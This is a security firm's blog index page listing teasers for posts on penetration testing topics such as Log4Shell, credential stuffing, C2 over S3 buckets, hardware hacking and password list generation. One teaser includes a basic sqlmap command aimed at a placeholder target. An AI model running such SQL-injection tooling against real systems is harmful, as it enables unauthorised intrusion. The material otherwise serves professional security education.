18 posts in the “Blog” category

Our team researches and documents bleeding-edge security concepts and hacking techniques. This blog explores these topics and more to keep you informed.

Are Your Cybersecurity Investments In Tools and Services Paying Off?

By Joedy Glenn | January 14, 2022 | Blog

Finding, implementing, and supporting cybersecurity tools and services within an organization can be a daunting task for a company of any size. There is no shortage of cybersecurity tools and services available to address just about every area of

Read More »

Why Critical Vulnerabilities Like Log4Shell Will Continue to Surface

By Cornel du Preez | December 14, 2021 | Blog

What is Log4Shell? Log4Shell is a critical vulnerability that affects the Log4J Java logging library (versions 2.14.0 and earlier) bundled into the Apache logging services. The vulnerability allows remote code execution (RCE) by a malicious actor

Read More »

User Enumeration in a Production Environment – Credential Stuffing 101

By Ryan Fisher | July 19, 2021 | Blog

Ah yes, credential stuffing! Almost as common as thanksgiving stuffing, yet as distasteful as black Friday shopping. Credential stuffing is especially effective when it’s coupled with user enumeration. The likelihood of user enumeration attacks

Read More »

Hacking 101: Getting Your Bearings

By Rob Waltman | August 19, 2021 | Blog

Network security is a unique field of IT, and unlike many other IT fields, it seems almost hostile to anyone new and looking to learn about pentesting. I’ve heard several statements that boil down to “I want to learn how to be a pentester but I

Read More »

Dangling DNS: Low Hanging Fruit with Severe Consequences

By Ryan Fisher | April 28, 2021 | Blog

In this blog we discuss dangling DNS and how if left unresolved, an attacker can mar the reputation of a victim company. First let’s start by defining Domain Name System (DNS). A Domain Name System is an assortment of databases that

Read More »

Exploiting Bring Your Own Device (BYOD)

By Anthony Ralston | February 12, 2021 | Blog

Bringing your own device (BYOD) is a common practice within many organizations and due to COVID-19, the adoption of BYOD has expanded. The belief that software or applications can protect data from bad actors or negligence does not always take

Read More »

Command and Control Through AWS S3 Buckets

By Anthony Ralston | January 13, 2021 | Blog

Many organizations leverage AWS as their cloud computing platform. Allowing access to and from their AWS resources is critical for workloads to operate uninterrupted. This means that an AWS VPC is often seen as a logical extension of the corporate

Read More »

Introduction to Hardware Hacking: Part 2

By Anthony Ralston | December 2, 2020 | Blog

In the last blog, we discussed the components that are used in hardware hacking, the discovery phase and how to pull information off a device leveraging a UART port and the Das U-Boot boot loader. However, in some cases we aren’t able to

Read More »

Introduction to Hardware Hacking: Part 1

By Anthony Ralston | November 13, 2020 | Blog

There are many devices out there that store information in different ways and unfortunately, not all of them take security into account. With the advent of the Internet of Things (IoT), device manufacturers are publishing devices faster than ever,

Read More »

Is your penetration testing vendor just trying to sell you products and services?

By Brent Brackin | September 17, 2020 | Blog

Not too long ago, while working at another company, I was subjected to a presentation by a paid speaker at our annual sales kickoff meeting.  Since I was heavily focused on security consulting solutions for my client base, our leadership assumed

Read More »

Shifting Security Left: A Practical Guide

By Cornel du Preez | November 5, 2020 | Blog

Application security practitioners often preach about the importance of shifting security left in the software development life-cycle (SDLC). The reason this catch-phrase so-easily resonates with leadership is simple: if it’s possible to identify

Read More »

Securing SuiteCRM on Apache

By Anthony Ralston | September 2, 2020 | Blog

SuiteCRM is a popular open-source Client Relations Manager (CRM). I took some time to review the code and basic implementation of the application within a vanilla Ubuntu Debian build. I found good security practices within the application itself,

Read More »

PHP Type Juggling

By Anthony Ralston | August 12, 2020 | Blog

Type juggling is an expected functionality of PHP when leveraging loose comparisons. However, it can be used to subvert intended operations. In this blog, we will discuss why type juggling occurs, what are the potential impacts, and why we should

Read More »

Our Response to COVID-19

By Cornel du Preez | April 13, 2020 | Blog

Abricto Security understands that all industries feel the impact of COVID-19 and we’re here to help. Our team is shifting our operating procedures to accommodate fully remote consultations and assessments. Here is how we plan to do so: We will

Read More »

Defining the Secure Software Development Lifecycle (SSDLC)

By Cornel du Preez | June 30, 2020 | Blog

Here at Abricto Security, we believe that application penetration tests only reveal the tip of the iceberg. Specifically, if we conduct an application penetration test and we find that it’s riddled with vulnerabilities, the remediation effort

Read More »

SQLmap Cheatsheet and Examples

By Cornel du Preez | April 2, 2020 | Blog

Target the http://target.server.com URL using the “-u” flag: sqlmap -u ‘http://target.server.com’ Specify POST requests by specifying the “–data” flag: sqlmap -u

Read More »

Extracting Private Keys From Public Keys Generated With Weak Random Number Generators

By Cornel du Preez | March 19, 2020 | Blog

Public key encryption is heavily utilized in modern implementations of SSH. By leveraging public key cryptography, administrators can generate both a public key and a private key to encrypt and decrypt data in transit. Using this method is favored

Read More »

Password List Generation Using CUPP

By Cornel du Preez | February 7, 2020 | Blog

In many of our network and web application penetration tests, we come across login portals that aren’t protected by anti-automation controls. Essentially, this allows us to launch unrestricted dictionary attacks on previously identified

Read More »